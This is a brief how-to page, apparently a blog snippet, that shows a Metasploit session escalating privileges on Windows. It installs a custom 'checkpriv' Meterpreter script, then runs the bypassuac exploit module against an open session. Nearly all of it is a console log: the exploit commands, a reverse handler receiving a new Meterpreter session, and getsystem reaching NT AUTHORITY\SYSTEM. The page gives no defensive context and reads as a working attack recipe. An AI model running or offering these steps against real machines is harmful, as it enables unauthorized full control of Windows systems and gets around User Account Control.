Metasploit - bypassuac

Download: checkpriv

Installation:
cp checkpriv.rb /opt/metasploit-framework/scripts/meterpreter/checkpriv.rb

meterpreter > run checkpriv[*] Admin token: false[*] Running as SYSTEM: false[*] UAC Enabled: truemeterpreter > getsystem[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:[-] Named Pipe Impersonation (In Memory/Admin)[-] Named Pipe Impersonation (Dropper/Admin)[-] Token Duplication (In Memory/Admin)msf exploit(bypassuac) > use exploit/windows/local/bypassuacmsf exploit(bypassuac) > set SESSION 3SESSION => 3msf exploit(bypassuac) > run[*] Started reverse handler on 192.168.1.100:4444 [*] UAC is Enabled, checking level...[+] UAC is set to Default[+] BypassUAC can bypass this setting, continuing...[+] Part of Administrators group! Continuing...[*] Uploaded the agent to the filesystem....[*] Uploading the bypass UAC executable to the filesystem...[*] Meterpreter stager executable 73802 bytes long being uploaded..[*] Sending stage (957486 bytes) to 192.168.1.100[*] Meterpreter session 5 opened (192.168.1.100:4444 -> 192.168.1.100:53232) at 2015-11-17 14:48:09 +0000meterpreter > getsystem...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).meterpreter > getuidServer username: NT AUTHORITY\SYSTEMmeterpreter > run checkpriv[*] Admin token: true[*] Running as SYSTEM: true[*] UAC Enabled: false